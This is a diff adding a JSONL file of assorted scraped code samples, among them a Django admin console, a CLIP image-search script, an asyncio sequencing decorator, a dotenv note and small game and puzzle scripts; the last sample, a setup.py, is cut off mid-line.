diff --git "a/6561.jsonl" "b/6561.jsonl" new file mode 100644--- /dev/null +++ "b/6561.jsonl" @@ -0,0 +1,827 @@ +{"seq_id":"275912651","text":"from pathlib import Path\nfrom typing import Union\n\nimport networkx as nx\n\n\ndef output_graph(G: nx.DiGraph, file_name: Union[Path, str]) -> None:\n \"\"\"Output a graph to a file, either as image or as dot file.\n\n Args:\n G: the DiGraph to write or plot\n file_name: the file name to write to. Extension can be svg, png or dot.\n\n Returns:\n Nothing\n\n Raises:\n ValueError when the file_name does not end on .svg, .png or .dot\n \"\"\"\n p = nx.drawing.nx_pydot.to_pydot(G)\n if not isinstance(file_name, Path):\n file_name = Path(file_name)\n\n if file_name.suffix == \".svg\":\n p.write_svg(file_name)\n elif file_name.suffix == \".png\":\n p.write_png(file_name)\n elif file_name.suffix == \".dot\":\n p.write_dot(file_name)\n else:\n raise ValueError(\"Extension should be .dot, .svg or .png\")\n","sub_path":"src/visions/utils/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"68309996","text":"import os\nimport argparse\nimport torch\nimport pdb\n\nimport clip\nfrom tokenizer import ClipTokenizer\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nimport pickle\nimport glob\nimport math\nfrom tqdm import tqdm\nfrom ast import literal_eval\n\nfrom searcher import Searcher\n\n\ndef encode_texts(text, model, tokenizer, device):\n text = tokenizer(text, return_tensors=\"pt\")\n text = text.to(device)\n text_embedding = model.encode_text(text)\n return text_embedding\n\ndef readimage(image_path):\n image = Image.open(image_path).convert('RGB')\n return image\n\ndef plot(query, hits):\n num = len(hits)\n \n plt.figure(figsize=(20, 14))\n for i, hit in enumerate(hits):\n image = readimage(hit['path'])\n plt.subplot(5, math.ceil(num / 5), i+1)\n plt.imshow(image)\n plt.title(f\"pid:{hit['pid']}\\nscore:{float(hit['score']):.3f}\", fontsize=12)\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n plt.savefig(f'{query}.png',bbox_inches=\"tight\")\n plt.cla()\n plt.clf()\n plt.close()\n\ndef main(args):\n # device\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n device = torch.device(device)\n \n # Setting tokenizer\n tokenizer = ClipTokenizer(\n bpe_path=args.bpe_path,\n context_length=args.text_length\n )\n print(f'Load Tokenizer with Vocab {tokenizer.vocab_size} Max Length {tokenizer.context_length} Complete')\n \n \n # Model\n if args.pretrain_clip == 'ViT-B/32':\n model = clip.model.CLIP(\n **vitb32_config(\n input_res=args.image_resolution,\n context_length=args.text_length,\n vocab_size=tokenizer.vocab_size\n )\n )\n \n elif args.pretrain_clip == 'RN50':\n model = clip.model.CLIP(\n **rn50_config(\n input_res=args.image_resolution,\n context_length=args.text_length,\n vocab_size=tokenizer.vocab_size\n )\n ) \n elif args.pretrain_clip == 'RN101':\n model = clip.model.CLIP(\n **rn101_config(\n input_res=args.image_resolution,\n context_length=args.text_length,\n vocab_size=tokenizer.vocab_size\n )\n ) \n else:\n raise NotImplementedError(f'{args.pretrain_clip} not implemented')\n ckpt = torch.load(args.load_model)\n state_dict = {k.partition('model.')[2]: v for k,v in ckpt['state_dict'].items()}\n model.load_state_dict(state_dict)\n model.to(device)\n model.eval()\n \n \n # Image Embedding\n paths = []\n embs = torch.tensor([])\n pbar = tqdm(list(glob.glob(os.path.join(args.emb_path, '*.pt')))[:50])\n 
for emb_file in pbar:\n        ckpt = torch.load(emb_file)\n        paths += literal_eval(ckpt['path'])\n        embs = torch.cat((embs, ckpt['emb']),dim=0)\n        pbar.set_postfix({'num_images': str(len(paths))})\n    \n    # Use GPU\n    embs = embs.to(device)\n    print('Path example:', paths[0])\n    print('Embedding example:', embs[0].shape)\n    \n    searcher = Searcher(embs, paths)\n    \n    # Search\n    while True:\n        word = input('Search words:')\n        word = word.strip()\n        if len(word) > 0:\n            word_embedding = encode_texts(word, model, tokenizer, device)\n            hits = searcher.search(word_embedding, top_k=[args.topk])[0]\n            plot(word, hits)\n    \n    \nif __name__=='__main__':    \n    parser = argparse.ArgumentParser()\n    parser.add_argument('--load_model', type=str, default='models/model.ckpt', required=False)\n    parser.add_argument('--pretrain_clip', default='ViT-B/32', type=str, required=False, help='RN50, RN101, ViT-B/32')\n    parser.add_argument('--text_length', default=77, type=int, required=True)\n    parser.add_argument('--bpe_path', default='src_openai_pretrain/bpe_simple_vocab_16e6.txt.gz', type=str, required=False)\n    parser.add_argument('--image_resolution', default=224, type=int, required=True)\n    parser.add_argument('--emb_path', default='./dataset/yfcc100m/emb')\n    parser.add_argument('--topk', default=25, type=int)\n    args = parser.parse_args()\n    \n    \n    main(args)","sub_path":"src_openai_pretrain/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584682111","text":"def solution(clothes):\n    line = []\n    mul = 1\n\n    # count how many items fall in each clothing category\n    while clothes:\n        keys = clothes[0][1]\n        number = 0\n        for i in clothes[:]:  # iterate over a copy so removing items does not skip any\n            if i[1] == keys:\n                number += 1\n                clothes.remove(i)\n\n        line.append(number)\n\n    # each category offers (count + 1) choices (one of its items, or none);\n    # subtract 1 to exclude the outfit where nothing is worn\n    for j in line:\n        mul *= j + 1\n\n    return mul - 1\n\n\nprint(solution([[\"yellowhat\", \"headgear\"], [\"bluesunglasses\", \"eyewear\"], [\"green_turban\", \"headgear\"]]))","sub_path":"programmers/clothes.py","file_name":"clothes.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"63401813","text":"\n\n#class header\nclass _PARTICULAR():\n\tdef __init__(self,): \n\t\tself.name = \"PARTICULAR\"\n\t\tself.definitions = [u'details or information about a person or an event, especially when officially recorded: ', u'If you are considering the particular, you are considering single examples rather than general matters or ideas: ']\n\n\t\tself.parents = []\n\t\tself.children = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_particular.py","file_name":"_particular.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633330730","text":"\"\"\"\ndotenv Note\n\nNotes on reading environment variables in Python.\nUsed in practice in waka-box.\n\npip install python-dotenv\npipenv install python-dotenv\n\nos.environ['SECRET_API_KEY'] raises KeyError if the key is missing.\nos.getenv('SECRET_API_KEY') returns None instead.\n\n\nTo write a multi-line value in .env:\nFOO=\"like\nthis\n\"\n\"\"\"\n\n\nclass EnvNotFoundError(WakaBoxException):\n    \"\"\"Exception raised when a given environment variable is not found.\n\n    Arguments:\n        WakaBoxException {[type]} -- [description]\n    \"\"\"\n\n\n# Handles the case where environment variables come from a .env file.\n# raise_error_if_not_found: do not raise an error even if no .env file is found.\ndotenv.load_dotenv(dotenv.find_dotenv(raise_error_if_not_found=False))\n\n\ndef 
get_env(keyname: str) -> str:\n    \"\"\"Gets an environment variable.\n\n    Arguments:\n        keyname {str} -- Name of the environment variable.\n\n    Raises:\n        EnvNotFoundError: The environment variable was not found.\n\n    Returns:\n        str -- Value of the environment variable.\n    \"\"\"\n    try:\n        # On GitHub Actions an unset environment variable still arrives as an empty string via the yaml, so check for blanks as well.\n        _ = os.environ[keyname]\n        if not _:\n            raise KeyError(f'{keyname} is empty.')\n        return _\n    except KeyError as e:\n        raise EnvNotFoundError(keyname) from e\n","sub_path":"01_Python/(2020-07-13)dotenvNote.py","file_name":"(2020-07-13)dotenvNote.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653012738","text":"# Essentially just extends auth.views but separated to keep it from\n# getting overly unwieldy\nfrom auth.views import *\n\ndef console(request, template=None):\n\n    context = {}\n    errors = []\n    templates = [\n        \"ajax\",\n        \"customers\",\n        \"media\",\n        \"pages\",\n        \"settings\",\n        \"theme\",\n        \"vendors\",\n        \"logout\",\n    ]\n\n    if template:\n        template = template.replace(\"/\",\"\")\n\n    if template and template not in templates:\n        return redirect(\"/console/\")\n\n    try:\n        site = Site.objects.get(domain=request.META['HTTP_HOST'])\n    except Site.DoesNotExist:\n        raise Exception(\"Congratulations! Your domain %s points to the correct site, but your site is not configured to use it.\" % request.META['HTTP_HOST'])\n\n    if template == \"logout\":\n        logout(request)\n        return redirect(\"/console/?prev=logout\")\n    elif (\n        request.POST.get('username', None) != None\n        and request.POST.get('password', None) != None\n    ):\n        form = AuthForm(data=request.POST, site=request.site) # 'username' and 'password' are expected in POST in each request\n        if not form.is_valid():\n            status = -1\n            message = \"Login failed:\"\n            for error in form.errors['__all__']:\n                errors.append(\"%s %s\" % (message, error))\n            template=\"login\"\n        else:\n            user = User.objects.get(username=form.cleaned_data['username'])\n            user.backend = 'django.contrib.auth.backends.ModelBackend'\n            login(request, user)\n            return redirect(\"/console/\")\n\n    if errors:\n        pass # Do nothing -- Login failed\n    elif not request.user.is_authenticated():  \n        template=\"login\"\n    elif not (\n        request.user.is_superuser\n        or (\n            request.user.userprofile.site_admin\n            and request.user.userprofile.site.domain == request.META['HTTP_HOST']\n        )\n    ):\n        errors.append(\"You do not have administrative privileges for %s\" % site.name)\n        template=\"login\"\n\n    else:\n        template=template or \"dashboard\"\n        context=eval(\"console_%s(request, site)\" % template)\n        if type(context) != dict:\n            return context\n\n    if (\"%s\" % request.GET.get('msg',\"\")).strip() != \"\":\n        errors.append(request.GET['msg'])\n\n    if request.GET.get(\"prev\",\"\") == \"logout\":\n        errors = [\"Log out was successful\"] + errors\n\n    context.update({\n        'errors' : errors,\n        'template' : template,\n    })\n\n    return render_to_response(\n        \"console/%s.html\" % (\n            (\"%s\" % (template or \"login\")),\n        ),\n        context,\n        context_instance=RequestContext(request)\n    )\n\ndef console_ajax(request, site):\n\n    context = {\n        'status' : 0,\n        'message' : \"Unknown request\",\n    }\n\n    cmd = request.POST.get('cmd')\n\n    if cmd == \"approve\":\n        from auth.admin import approve_account_action\n        try:\n            p = UserProfile.objects.get(\n                site=site,\n                pk=request.POST.get('profilePk')\n            )\n            if not p.submitted or not p.validated:\n                context['message'] = \"This account is in the wrong state for approval\"\n            elif not p.approved:\n                approve_account_action(None, None, UserProfile.objects.filter(pk=p.pk))\n                context['status'] = 1\n            
else:\n                context['message'] = \"This account has already been approved\"\n        except UserProfile.DoesNotExist:\n            context['message'] = \"Unknown user\"\n\n    elif cmd in [\"activate\",\"deactivate\"]:\n        try:\n            p = UserProfile.objects.get(\n                site=site,\n                pk=request.POST.get('profilePk')\n            )\n            if not p.submitted or not p.validated or not p.approved:\n                context['message'] = \"This account is in the wrong state for a change in activation status\"\n            elif p.user == request.user:\n                context['message'] = 'You cannot change the activation status of your own account'\n            elif not p.user.is_active and cmd == \"activate\":\n                User.objects.filter(pk=p.user.pk).update(is_active=True)\n                context['status'] = 1\n            elif p.user.is_active and cmd == \"deactivate\":\n                User.objects.filter(pk=p.user.pk).update(is_active=False)\n                context['status'] = 1\n            else:\n                context['message'] = \"No change in activation status\"\n        except UserProfile.DoesNotExist:\n            context['message'] = \"Unknown user\"\n\n    elif cmd in [\"grant-admin\",\"revoke-admin\"]:\n        try:\n            p = UserProfile.objects.get(\n                site=site,\n                pk=request.POST.get('profilePk')\n            )\n            if not p.submitted or not p.validated or not p.approved or not p.user.is_active:\n                context['message'] = \"This account is in the wrong state for a change in admin status\"\n            elif p.user == request.user:\n                context['message'] = 'You cannot change the admin status of your own account'\n            elif not p.site_admin and cmd == \"grant-admin\":\n                UserProfile.objects.filter(pk=p.pk).update(site_admin=True)\n                context['status'] = 1\n            elif p.site_admin and cmd == \"revoke-admin\":\n                UserProfile.objects.filter(pk=p.pk).update(site_admin=False)\n                context['status'] = 1\n            else:\n                context['message'] = \"No change in admin status\"\n        except UserProfile.DoesNotExist:\n            context['message'] = \"Unknown user\"\n\n    return HttpResponse(\n        json.dumps(context),\n        mimetype=\"application/json\"\n    )\n\ndef console_customers(request, site):\n\n    from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n    pp = 25\n    page = request.GET.get('p', 1) # Validated below after pagination\n\n    buyers = Buyer.objects.filter(userprofile__site = request.site).order_by(\"-pk\")\n\n    # Query filter\n    if (\"%s\" % request.GET.get('q',\"\")).strip() != \"\":\n\n        terms = request.GET['q'].split(' ')\n        for t in terms:\n            if t.strip() == '':\n                continue\n            regex = (\"(?=.*%s).*\" % re.escape(t))\n            buyers = buyers.filter(\n                Q(userprofile__user__first_name__iregex = regex)\n                | Q(userprofile__user__last_name__iregex = regex)\n                | Q(name__iregex = regex)\n                | Q(userprofile__user__email__iregex = regex)\n                | Q(userprofile__fedtaxid__iregex = regex)\n            )\n\n    # Registration status\n    if request.GET.get('submitted') == 'N':\n        buyers = buyers.exclude(userprofile__submitted=True)\n    elif request.GET.get('submitted') == 'Y':\n        buyers = buyers.filter(userprofile__submitted=True)\n\n    # Email validation status\n    if request.GET.get('validated') == 'N':\n        buyers = buyers.exclude(userprofile__validated=True)\n    elif request.GET.get('validated') == 'Y':\n        buyers = buyers.filter(userprofile__validated=True)\n\n    # Account Approval Status\n    if request.GET.get('approved') == 'N':\n        buyers = buyers.exclude(userprofile__approved=True)\n    elif request.GET.get('approved') == 'Y':\n        buyers = buyers.filter(userprofile__approved=True)\n\n    # Account Status\n    if request.GET.get('active') == 'N':\n        buyers = buyers.exclude(userprofile__user__is_active=True)\n    elif request.GET.get('active') == 'Y':\n        buyers = buyers.filter(userprofile__user__is_active=True)\n\n    # Admin Status\n    if 
request.GET.get('site_admin') == 'N':\n buyers = buyers.exclude(userprofile__site_admin=True)\n elif request.GET.get('site_admin') == 'Y':\n buyers = buyers.filter(userprofile__site_admin=True)\n\n # Paginate the search\n P = Paginator(buyers, pp)\n\n # Validate page number\n try: page = int(page)\n except ValueError: page = 1\n page = 1 if (page < 1 or page > P.num_pages) else page\n\n # Get customer data for this page\n try:\n page_data = P.page(page)\n except PageNotAnInteger:\n page_data = P.page(1)\n except EmptyPage:\n page_data = P.page(P.num_pages)\n\n return {\n \"form\" : ConsoleCustomerForm(request.GET),\n \"total_matches\" : buyers.count(),\n \"page\" : page,\n \"pages\" : max(P.page_range),\n \"GET_str_no_page\" : \"%s\" % \"&\".join([\"%s=%s\" % (k, request.GET[k]) for k in request.GET.keys() if k != \"p\"]),\n \"page_range\" : range(1, max(P.page_range) + 1),\n \"start\" : ((page - 1) * pp) + 1,\n \"stop\" : P.count if (((page - 1) * pp) + pp > P.count) else ((page - 1) * pp) + pp,\n \"users\" : page_data.object_list,\n }\n\ndef console_dashboard(request, site):\n return {}\n\ndef console_media(request, site):\n\n if request.POST.get('delete'):\n try:\n request.site.mediaimages.get(\n pk=int(request.POST.get('delete'))\n ).delete()\n return HttpResponse(\n json.dumps({\"status\" : 1}),\n mimetype=\"application/json\"\n )\n\n except Exception as e:\n return HttpResponse(\n json.dumps({\n \"status\" : 0,\n \"message\" : \"%s\" % e,\n }),\n mimetype=\"application/json\"\n )\n\n elif request.GET.get('qqfile'):\n\n try:\n\n form = ConsoleMediaForm(\n { 'site' : request.site.pk },\n { 'image' : request.FILES[request.GET['qqfile']] },\n )\n if form.is_valid():\n form.save()\n else:\n raise Exception(\n \" \".join(\n dict(form.errors.items()).get('image',[\"Unexpected upload error\"])\n )\n )\n\n except Exception as e:\n return HttpResponse(\n json.dumps({\n \"error\" : \"%s\" % e,\n }),\n mimetype=\"application/json\"\n )\n\n return HttpResponse(\n json.dumps({\"success\" : 1}),\n mimetype=\"application/json\"\n )\n\n return {}\n\ndef console_pages(request, site):\n\n try:\n page = request.site.pages.get(pk=request.GET.get('page'))\n except Exception as e:\n if request.GET.get('page') == \"new\":\n page = SitePage(site=request.user.userprofile.site)\n else:\n page = site.profile.homepage\n\n if page not in request.site.profile.reserved_pages and request.GET.get('action') == \"delete\":\n name = \"%s\" % page.title\n page.delete()\n return redirect('/console/pages/?msg=The page \"%s\" was successfully deleted.' 
% name)\n\n    if request.method == \"POST\":\n\n        data = copy.deepcopy(request.POST)\n\n        data['home'] = False\n        data['contact'] = False\n        data['termspage'] = False\n\n        if page == site.profile.homepage:\n            data['title'] = 'Home Page'\n            data['home'] = True\n            data['published'] = True\n            data['link_only'] = False\n            data['sort_order'] = 0\n            data['slug'] = 'index'\n        elif page == site.profile.contactpage:\n            data['published'] = True\n            data['contact'] = True\n            data['link_only'] = False\n            data['slug'] = 'contactus'\n            data['contents'] = ' '\n        elif page == site.profile.termspage:\n            data['published'] = True\n            data['termspage'] = True\n            data['link_only'] = False\n            data['slug'] = 'termsandconditions'\n\n        if data.get('link_only') == \"True\":\n            data['slug'] = '#' # Our urls.py only looks for alphanum, so this won't do anything\n\n        form = ConsolePageForm(data, instance=page)\n        if form.is_valid():\n            form.save()\n            if request.GET.get('page') == \"new\":\n                return redirect(\"/console/pages/?page=%s\" % form.instance.pk)\n    else:\n        form = ConsolePageForm(instance=page)\n\n    return {\n        'form' : form,\n        'pages' : request.site.pages.order_by(\"pk\"),\n    }\n\ndef console_settings(request, site):\n\n    if request.method == \"POST\":\n\n        siteform = ConsoleSettingsSiteForm(request.POST, instance=site)\n        siteprofileform = ConsoleSettingsSiteProfileForm(request.POST, request.FILES) #, instance=site.profile)\n\n        if siteform.is_valid():\n            siteform.save()\n            if siteprofileform.is_valid():\n                if (site.profile.logo and 'logo' in request.FILES) or request.POST.get('logo-clear', \"\") != \"\":\n                    site.profile.logo.delete() # delete it\n                if (site.profile.favicon and 'favicon' in request.FILES) or request.POST.get('favicon-clear', \"\") != \"\":\n                    site.profile.favicon.delete() # delete it\n                # If we instantiate initially with the instance, we lose reference to the original files and can't delete them\n                siteprofileform = ConsoleSettingsSiteProfileForm(request.POST, request.FILES, instance=site.profile)\n                siteprofileform.save()\n                return redirect(\"/console/settings/\")\n\n    else:\n        siteform = ConsoleSettingsSiteForm(instance=site)\n        siteprofileform = ConsoleSettingsSiteProfileForm(instance=site.profile)\n\n    return {\n        \"siteform\" : siteform,\n        \"siteprofileform\" : siteprofileform,\n    }\n\ndef console_theme(request, site):\n\n    # Get a list of all files included in include.css\n    file = open(\"%stheme/site-%s/css/include.css\" % (MEDIA_ROOT, site.pk), \"r\")\n    contents = file.read()\n    file.close()\n\n    lines = [(\"%s\" % l).strip() for l in contents.split(\"\\n\")]\n    filenames = [\"include.css\"]\n    for line in lines:\n        if line[0:7] != \"@import\":\n            continue\n        filenames.append(\n            line.split(\" \")[1].strip()[4:-1]\n        )\n\n    # Get the contents of the specifically requested file (if applicable)\n    contents = \"\"\n    if request.GET.get('file'):\n        path = \"%stheme/site-%s/css/%s\" % (MEDIA_ROOT, site.pk, request.GET['file'])\n        if request.POST.get('contents', None) != None:\n            file = open(path, \"w\") # \"w\" truncates so shorter saves don't leave stale trailing content\n            file.write(request.POST['contents'])\n            file.close()\n\n        try:\n            file = open(path, \"r\")\n            contents = file.read()\n            file.close()\n        except:\n            contents = \"\"\n    return {\n        \"filenames\" : filenames,\n        \"contents\" : contents,\n    }\n\ndef console_vendors(request, site):\n\n    from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n    pp = 25\n    page = request.GET.get('p', 1) # Validated below after pagination\n\n    vendors = Vendor.objects.filter(userprofile__site = request.site).order_by(\"-pk\")\n\n    # Query filter\n    if (\"%s\" % 
request.GET.get('q',\"\")).strip() != \"\":\n\n        terms = request.GET['q'].split(' ')\n        for t in terms:\n            if t.strip() == '':\n                continue\n            regex = (\"(?=.*%s).*\" % re.escape(t))\n            vendors = vendors.filter(\n                Q(userprofile__user__first_name__iregex = regex)\n                | Q(userprofile__user__last_name__iregex = regex)\n                | Q(name__iregex = regex)\n                | Q(userprofile__user__email__iregex = regex)\n                | Q(userprofile__fedtaxid__iregex = regex)\n            )\n\n    # Registration status\n    if request.GET.get('submitted') == 'N':\n        vendors = vendors.exclude(userprofile__submitted=True)\n    elif request.GET.get('submitted') == 'Y':\n        vendors = vendors.filter(userprofile__submitted=True)\n\n    # Email validation status\n    if request.GET.get('validated') == 'N':\n        vendors = vendors.exclude(userprofile__validated=True)\n    elif request.GET.get('validated') == 'Y':\n        vendors = vendors.filter(userprofile__validated=True)\n\n    # Account Approval Status\n    if request.GET.get('approved') == 'N':\n        vendors = vendors.exclude(userprofile__approved=True)\n    elif request.GET.get('approved') == 'Y':\n        vendors = vendors.filter(userprofile__approved=True)\n\n    # Account Status\n    if request.GET.get('active') == 'N':\n        vendors = vendors.exclude(userprofile__user__is_active=True)\n    elif request.GET.get('active') == 'Y':\n        vendors = vendors.filter(userprofile__user__is_active=True)\n\n    # Admin Status\n    if request.GET.get('site_admin') == 'N':\n        vendors = vendors.exclude(userprofile__site_admin=True)\n    elif request.GET.get('site_admin') == 'Y':\n        vendors = vendors.filter(userprofile__site_admin=True)\n\n    # Paginate the search\n    P = Paginator(vendors, pp)\n\n    # Validate page number\n    try: page = int(page)\n    except ValueError: page = 1\n    page = 1 if (page < 1 or page > P.num_pages) else page\n\n    # Get customer data for this page\n    try:\n        page_data = P.page(page)\n    except PageNotAnInteger:\n        page_data = P.page(1)\n    except EmptyPage:\n        page_data = P.page(P.num_pages)\n\n    return {\n        \"form\" : ConsoleCustomerForm(request.GET),\n        \"total_matches\" : vendors.count(),\n        \"page\" : page,\n        \"pages\" : max(P.page_range),\n        \"GET_str_no_page\" : \"%s\" % \"&\".join([\"%s=%s\" % (k, request.GET[k]) for k in request.GET.keys() if k != \"p\"]),\n        \"page_range\" : range(1, max(P.page_range) + 1),\n        \"start\" : ((page - 1) * pp) + 1,\n        \"stop\" : P.count if (((page - 1) * pp) + pp > P.count) else ((page - 1) * pp) + pp,\n        \"users\" : page_data.object_list,\n    }\n    \nclass ConsoleCustomerForm(forms.Form):\n    q = forms.CharField()\n    submitted = forms.TypedChoiceField(\n        choices=(('', 'Either'), ('Y','Submitted'), ('N','Not Submitted')),\n        widget=forms.RadioSelect\n    )\n    validated = forms.TypedChoiceField(\n        choices=(('', 'Either'), ('Y','Validated'), ('N','Not Validated')),\n        widget=forms.RadioSelect\n    )\n    approved = forms.TypedChoiceField(\n        choices=(('', 'Either'), ('Y','Approved'), ('N','Awaiting Approval')),\n        widget=forms.RadioSelect\n    )\n    active = forms.TypedChoiceField(\n        choices=(('', 'Either'), ('Y','Active'), ('N','Inactive')),\n        widget=forms.RadioSelect\n    )\n    site_admin = forms.TypedChoiceField(\n        choices=(('', 'Either'), ('Y','Site Admin'), ('N','Non-Admin')),\n        widget=forms.RadioSelect\n    )\n\nclass ConsolePageForm(forms.ModelForm):\n    link_only = forms.TypedChoiceField(\n        coerce=lambda x: x == 'True',\n        choices=((False, 'Page With Content'), (True, 'Link')),\n        widget=forms.RadioSelect\n    )\n    class Meta:\n        model = SitePage\n        exclude = [\"site\"]\n\nclass ConsoleMediaForm(forms.ModelForm):\n    image = forms.ImageField()\n    class Meta:\n        model = SiteMediaImage\n\nclass 
ConsoleSettingsSiteForm(forms.ModelForm):\n class Meta:\n model = Site\n\nclass ConsoleSettingsSiteProfileForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(ConsoleSettingsSiteProfileForm, self).__init__(*args, **kwargs)\n for key in [\n \"tagline\",\n \"metadescription\",\n \"metakeywords\",\n \"logo\",\n \"favicon\",\n \"facebook_id\",\n \"twitter_id\",\n \"linkedin_id\",\n \"googleplus_id\",\n ]:\n self.fields[key].required = False\n\n class Meta:\n model = SiteProfile\n exclude = [\"site\"]\n","sub_path":"auth/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":19786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"389072613","text":"import asyncio\nfrom collections import deque\nfrom functools import wraps\nfrom typing import Dict, List\n\nimport attr\n\n\n@attr.s(auto_attribs=True)\nclass Context:\n in_queue: asyncio.Queue\n out_queue: asyncio.Queue\n initialized: bool\n\n\ncontexts: Dict[str, Context] = {}\n\n\ndef run_sequentially_in_context(target_args: List[str] = None):\n \"\"\"All request to function with same calling context will be run sequentially.\n\n Example:\n\n Given the following decorated function\n\n @run_sequentially_in_context(target_args=[\"param3\", \"param1\"])\n async def func(param1, param2, param3):\n await asyncio.sleep(1)\n\n The context will be formed by the values of the arguments \"param3\" and \"param1\".\n The values must be serializable as they will be converted to string\n and put together as storage key for the context.\n\n The below calls will all run in a sequence:\n\n functions = [\n func(1, \"something\", 3),\n func(1, \"argument.attribute\", 3),\n func(1, \"here\", 3),\n ]\n await asyncio.gather(*functions)\n\n note the special \"argument.attribute\", which will use the attribute of argument to create the context.\n\n The following calls will run in parallel, because they have different contexts:\n\n functions = [\n func(1, \"something\", 3),\n func(2, \"else\", 3),\n func(3, \"here\", 3),\n ]\n await asyncio.gather(*functions)\n\n \"\"\"\n target_args = [] if target_args is None else target_args\n\n def internal(decorated_function):\n def get_context(args, kwargs: Dict) -> Context:\n arg_names = decorated_function.__code__.co_varnames[\n : decorated_function.__code__.co_argcount\n ]\n search_args = dict(zip(arg_names, args))\n search_args.update(kwargs)\n\n key_parts = deque()\n for arg in target_args:\n sub_args = arg.split(\".\")\n main_arg = sub_args[0]\n if main_arg not in search_args:\n message = (\n f\"Expected '{main_arg}' in '{decorated_function.__name__}'\"\n f\" arguments. 
Got '{search_args}'\"\n )\n raise ValueError(message)\n context_key = search_args[main_arg]\n for attribute in sub_args[1:]:\n potential_key = getattr(context_key, attribute)\n if not potential_key:\n message = f\"Expected '{attribute}' attribute in '{context_key.__name__}' arguments.\"\n raise ValueError(message)\n context_key = potential_key\n\n key_parts.append(f\"{decorated_function.__name__}_{context_key}\")\n\n key = \":\".join(map(str, key_parts))\n\n if key not in contexts:\n contexts[key] = Context(\n in_queue=asyncio.Queue(),\n out_queue=asyncio.Queue(),\n initialized=False,\n )\n\n return contexts[key]\n\n @wraps(decorated_function)\n async def wrapper(*args, **kwargs):\n context: Context = get_context(args, kwargs)\n\n if not context.initialized:\n context.initialized = True\n\n async def worker(in_q: asyncio.Queue, out_q: asyncio.Queue):\n while True:\n awaitable = await in_q.get()\n in_q.task_done()\n try:\n result = await awaitable\n except Exception as e: # pylint: disable=broad-except\n result = e\n await out_q.put(result)\n\n asyncio.create_task(worker(context.in_queue, context.out_queue))\n\n await context.in_queue.put(decorated_function(*args, **kwargs))\n\n wrapped_result = await context.out_queue.get()\n if isinstance(wrapped_result, Exception):\n raise wrapped_result\n\n return wrapped_result\n\n return wrapper\n\n return internal\n","sub_path":"services/director-v2/src/simcore_service_director_v2/utils/async_utils.py","file_name":"async_utils.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"413593620","text":"import sys\r\nfrom open.brasil.gameserver.datatables\t\timport ItemTable\r\nfrom open.brasil.gameserver.model.quest\t\timport State\r\nfrom open.brasil.gameserver.model.quest\t\timport QuestState\r\nfrom open.brasil.gameserver.model.quest.jython\timport QuestJython as JQuest\r\nfrom open.brasil.util import Rnd \r\n\r\nBOX = 29116\r\n\r\ndef dropItem(npc,itemId,count):\r\n\tditem = ItemTable.getInstance().createItem(\"Loot\", itemId, count, None)\r\n\tditem.dropMe(npc, npc.getX(), npc.getY(), npc.getZ());\r\n\r\nclass baylorChest(JQuest):\r\n\tdef __init__(self,id,name,descr):\r\n\t\tself.isSpawned = False\r\n\t\tJQuest.__init__(self,id,name,descr)\r\n\r\n\tdef onKill (self,npc,player,isPet):\r\n\t\tchance = Rnd.get(100)\r\n\t\tif chance <= 1 :\r\n\t\t\tdropItem(npc,9470,1)\r\n\t\telif chance >= 2 and chance <= 32 :\r\n\t\t\tdropItem(npc,6578,2)\r\n\t\telse:\r\n\t\t\tdropItem(npc,6704,10)\r\n\t\treturn\r\n\r\nQUEST = baylorChest(-1, \"baylorChest\", \"ai\")\r\n\r\nQUEST.addKillId(BOX)","sub_path":"dp/data/scripts/ai/individual/baylorChest.py","file_name":"baylorChest.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"204506087","text":"#from distutils.core import setup\nfrom setuptools import setup\nfrom distutils.extension import Extension\n#from setuptools import Extension\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\n\n# setup.py file\nimport sys\nimport os\nimport shutil\n\n\n# clean previous build\nfor root, dirs, files in os.walk(\".\", topdown=False):\n for name in files:\n if (name.startswith(\"civy\") and not(name.endswith(\".pyx\") or name.endswith(\".pxd\"))):\n os.remove(os.path.join(root, name))\n for name in dirs:\n if (name == \"build\"):\n pass\n #shutil.rmtree(name)\n\ninc_dirs = [os.getcwd(), 'freeciv/utility', 
